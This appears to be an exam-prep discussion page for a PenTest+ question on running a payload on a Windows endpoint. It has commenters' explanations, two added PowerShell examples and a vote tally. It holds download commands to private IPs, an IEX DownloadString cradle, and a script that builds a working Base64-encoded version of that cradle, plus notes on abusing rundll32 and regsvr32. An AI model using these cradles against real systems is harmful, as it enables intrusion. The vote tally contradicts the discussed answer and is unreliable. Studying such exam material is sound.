A penetration tester gains initial access to an endpoint and needs to execute a payload to obtain additional access. Which of the following commands should the penetration tester use?
A.
powershell.exe impo C:\tools\foo.ps1
B.
certutil.exe -f https://192.168.0.1/foo.exe bad.exe
C.
powershell.exe -noni -encode IEX.DownloadString("http://172.16.0.1/")
D.
rundll32.exe c:\path\foo.dll,functName
rundll32.exe is used to load and execute an exported function from a DLL, which is a common way for a tester to run a DLL payload on an endpoint. The other options are malformed or incorrect:
A: impo is not a valid PowerShell command.
B: certutil can be abused to download files but the shown syntax is incorrect (and it's more for file retrieval than directly executing a payload).
C: The -encode usage is incorrect; -EncodedCommand expects base64 and the IEX.DownloadString(...) form is malformed.
A. powershell.exe impo C:\tools\foo.ps1 ❌
• Import-Module alone does not execute a payload.
B. certutil.exe -f https://192.168.0.1/foo.exe bad.exe ❌
• Downloads the file, but does not execute it automatically.
C. powershell.exe -noni -encode IEX.DownloadString(...) ❌ for PT0-003 context
• While this works in practice, the exam sometimes expects native Windows binaries for executing a staged payload, not PowerShell scripting.
• CompTIA exam wording often hints at DLL execution, which is a core “payload execution technique” they emphasize.
D. rundll32.exe c:\path\foo.dll,functName ✅
• Uses a native Windows utility to execute a function exported in a DLL.
• Common in post-exploitation and exactly matches what CompTIA expects when asking about executing a payload from an endpoint.
• Can trigger a malicious DLL payload, which achieves the goal of additional access.
Rundll32:
• Built-in Windows binary that loads a DLL and executes a function inside it.
• Frequently used in pentesting for payload execution without creating an executable.
• Exam frequently tests recognition of native Windows execution methods (Rundll32, MSBuild, Regsvr32, etc.).
🔑 Memory Hook for PT0-003:
• Payload execution on Windows → think “native binaries first”.
• rundll32.exe, msbuild.exe, regsvr32.exe are built-in binaries for executing payloads.
• PowerShell works in real-life attacks, but the exam prioritizes Windows-native execution mechanisms.
rundll32.exe is a legitimate Windows utility that can be used to execute functions exported from DLL files. Penetration testers (and attackers) often use it to execute malicious payloads in a way that blends in with normal system activity.
The command specifies the path to the DLL file (c:\path\foo.dll) and the function to execute (functName).
A. powershell.exe impo C:\tools\foo.ps1: This command is syntactically incorrect. The impo argument is not valid for PowerShell.
B. certutil.exe -f https://192.168.0.1/foo.exe bad.exe: While certutil.exe is often used to download files, this command only downloads the file (foo.exe) and saves it as bad.exe. It does not execute the payload.
C. powershell.exe -noni -encode IEX.DownloadString("http://172.16.0.1/"): This command attempts to execute a PowerShell script, but the syntax is incorrect. The -encode flag is used to provide a base64-encoded script, not a direct command.
rundll32.exe is a legitimate Windows utility used for executing functions within DLL files. Attackers often misuse it to execute malicious code. This option assumes the attacker has already placed the malicious DLL (foo.dll) on the compromised system (at c:\path). By specifying the DLL and the functName (the name of the function within the DLL that contains the malicious code), the attacker can trigger the payload. This technique is commonly used for executing payloads and is relevant to the Pentest+ exam objectives.
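The comment above spells out the `<dll>,<entry>` syntax. Added example, not from the page or any commenter: a PowerShell check, run before invoking rundll32, that the named entry point is really exported. rundll32 resolves the entry with GetProcAddress, so the name must match an export exactly (case included); the script reads the PE export table directly rather than relying on dumpbin. Since the page's foo.dll does not exist, it is exercised against shell32.dll and its well-known Control_RunDLL export; the callback signature quoted in the header comment is the documented one rundll32 expects.

```powershell
# Added example (not from the page or any commenter). Confirms that the entry
# named in "rundll32.exe <dll>,<entry>" is exported before calling it; rundll32
# resolves it with GetProcAddress (case-sensitive) and otherwise shows the
# "Missing entry" dialog. Reads the PE export table directly (no dumpbin).
# The exported function rundll32 calls must have this shape:
#   void CALLBACK Entry(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow);
# shell32.dll,Control_RunDLL is used below only because foo.dll does not exist.

function Get-DllExportNames {
    param([Parameter(Mandatory)][string]$Path)
    $b = [System.IO.File]::ReadAllBytes((Resolve-Path $Path).Path)
    if ([BitConverter]::ToUInt16($b, 0) -ne 0x5A4D) { throw "$Path has no MZ header" }
    $pe = [BitConverter]::ToInt32($b, 0x3C)                          # e_lfanew
    if ([BitConverter]::ToUInt32($b, $pe) -ne 0x4550) { throw "$Path has no PE signature" }
    $fileHdr     = $pe + 4
    $numSections = [BitConverter]::ToUInt16($b, $fileHdr + 2)
    $optSize     = [BitConverter]::ToUInt16($b, $fileHdr + 16)
    $opt         = $fileHdr + 20
    # DataDirectory[0] (exports) sits at +96 in PE32 and +112 in PE32+ (magic 0x20B).
    $ddOff       = if ([BitConverter]::ToUInt16($b, $opt) -eq 0x20B) { 112 } else { 96 }
    $exportRva   = [BitConverter]::ToUInt32($b, $opt + $ddOff)
    if ($exportRva -eq 0) { return @() }                             # nothing exported

    # Section table follows the optional header; needed to map RVAs to file offsets.
    $sections = foreach ($i in 0..($numSections - 1)) {
        $s = $opt + $optSize + 40 * $i
        [pscustomobject]@{
            VA   = [BitConverter]::ToUInt32($b, $s + 12)             # VirtualAddress
            Size = [Math]::Max([BitConverter]::ToUInt32($b, $s + 8), [BitConverter]::ToUInt32($b, $s + 16))
            Raw  = [BitConverter]::ToUInt32($b, $s + 20)             # PointerToRawData
        }
    }
    function Convert-RvaToOffset([uint32]$Rva) {
        foreach ($s in $sections) {
            if ($Rva -ge $s.VA -and $Rva -lt ($s.VA + $s.Size)) { return [int]($Rva - $s.VA + $s.Raw) }
        }
        throw ('RVA 0x{0:X} is outside every section' -f $Rva)
    }

    $dir      = Convert-RvaToOffset $exportRva
    $numNames = [BitConverter]::ToUInt32($b, $dir + 24)              # NumberOfNames
    if ($numNames -eq 0) { return @() }
    $names    = Convert-RvaToOffset ([BitConverter]::ToUInt32($b, $dir + 32))  # AddressOfNames
    foreach ($i in 0..($numNames - 1)) {
        $off = Convert-RvaToOffset ([BitConverter]::ToUInt32($b, $names + 4 * $i))
        $end = $off
        while ($b[$end] -ne 0) { $end++ }                            # NUL-terminated ASCII
        [System.Text.Encoding]::ASCII.GetString($b, $off, $end - $off)
    }
}

function Test-Rundll32Entry {
    param([Parameter(Mandatory)][string]$DllPath, [Parameter(Mandatory)][string]$EntryPoint)
    $exports = @(Get-DllExportNames $DllPath)
    # rundll32 prefers an "<Entry>W" Unicode export when one exists, otherwise "<Entry>";
    # either way the lookup is an exact, case-sensitive match.
    foreach ($candidate in "${EntryPoint}W", $EntryPoint) {
        if ($exports -ccontains $candidate) { return $candidate }
    }
    $near = $exports | Where-Object { $_ -like "*$EntryPoint*" }    # case-insensitive hints
    if ($near) { Write-Warning "No exact export '$EntryPoint'; similar names: $($near -join ', ')" }
    return $null
}

$dll = "$env:SystemRoot\System32\shell32.dll"
Test-Rundll32Entry $dll 'Control_RunDLL'   # returns the export rundll32 would actually call
Test-Rundll32Entry $dll 'control_rundll'   # wrong case: returns $null and warns with the hint
# Only once the check returns a name is the option D form safe to run:
#   rundll32.exe $dll,Control_RunDLL
```

The case-sensitivity point is the one that bites in practice: a DLL built for 32-bit with stdcall may export `_functName@16` rather than `functName`, and a typo in case produces the same "Missing entry" error as a wrong name, which the hint output above makes visible.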
Why it's more likely correct:
It pulls a script from a remote server and executes it immediately.
It doesn't rely on a pre-existing file like a DLL or EXE.
This technique is widely used in real-world red team operations, e.g., Cobalt Strike, Empire, etc.
It aligns with post-exploitation behavior for staging additional payloads.
upvoted 2 times
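Several comments above turn on what `-EncodedCommand` takes and what the working download cradle looks like. Added example, not from the page or any commenter: PowerShell helpers that build a valid `-EncodedCommand` argument (the script as UTF-16LE bytes, Base64-encoded) and decode one back out of a logged command line. powershell.exe matches switches by unambiguous prefix (`-e`, `-enc`, `-EncodedCommand`), so the defect in option C is the argument, which is neither Base64 nor valid syntax. The cradle string and the 172.16.0.1 URL are placeholders taken from option C; the script encodes them and never runs or downloads anything.

```powershell
# Added example (not from the page or any commenter). Builds and decodes the
# -EncodedCommand argument that powershell.exe actually expects: script text as
# UTF-16LE bytes, Base64-encoded. The cradle and 172.16.0.1 URL are placeholders
# from option C; nothing here is executed or downloaded.

function ConvertTo-EncodedCommand {
    param([Parameter(Mandatory)][string]$Script)
    # UTF-16LE ("Unicode" in .NET), not UTF-8: a UTF-8 blob decodes to garbage.
    [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($Script))
}

function ConvertFrom-EncodedCommand {
    param([Parameter(Mandatory)][string]$Base64)
    [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Base64))
}

function Get-EncodedCommandFromLine {
    # Pull the Base64 blob out of a logged command line (Sysmon EID 1, Security 4688).
    # powershell.exe accepts any unambiguous prefix of -EncodedCommand plus the
    # documented -ec alias, so accept the same set here.
    param([Parameter(Mandatory)][string]$CommandLine)
    if ($CommandLine -match '[-/](e[a-z]*)\s+([A-Za-z0-9+/=]+)') {
        $switch = $Matches[1].ToLower()
        if ($switch -eq 'ec' -or 'encodedcommand'.StartsWith($switch)) { return $Matches[2] }
    }
    return $null
}

# Working form of the cradle that option C garbles: IEX receives the string that
# DownloadString returns; "IEX.DownloadString(...)" is not valid syntax.
$cradle = "IEX (New-Object Net.WebClient).DownloadString('http://172.16.0.1/')"
$b64    = ConvertTo-EncodedCommand $cradle
$launch = "powershell.exe -NoProfile -NonInteractive -EncodedCommand $b64"
Write-Output "Launch line (not run here): $launch"

# Round trip the launch line the way a detection engineer would from a
# process-creation event, and confirm the decode matches what was encoded.
$decoded = ConvertFrom-EncodedCommand (Get-EncodedCommandFromLine $launch)
if ($decoded -ne $cradle) { throw 'round trip failed' }
Write-Output "Decoded: $decoded"
```

The decoder is the half worth keeping: `-enc` blobs in 4688 or Sysmon process-creation events are opaque until decoded as UTF-16LE, and decoding them as UTF-8 (the common mistake) yields interleaved NUL characters rather than the script.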
...
Community vote distribution
A (35%)
C (25%)
B (20%)
Other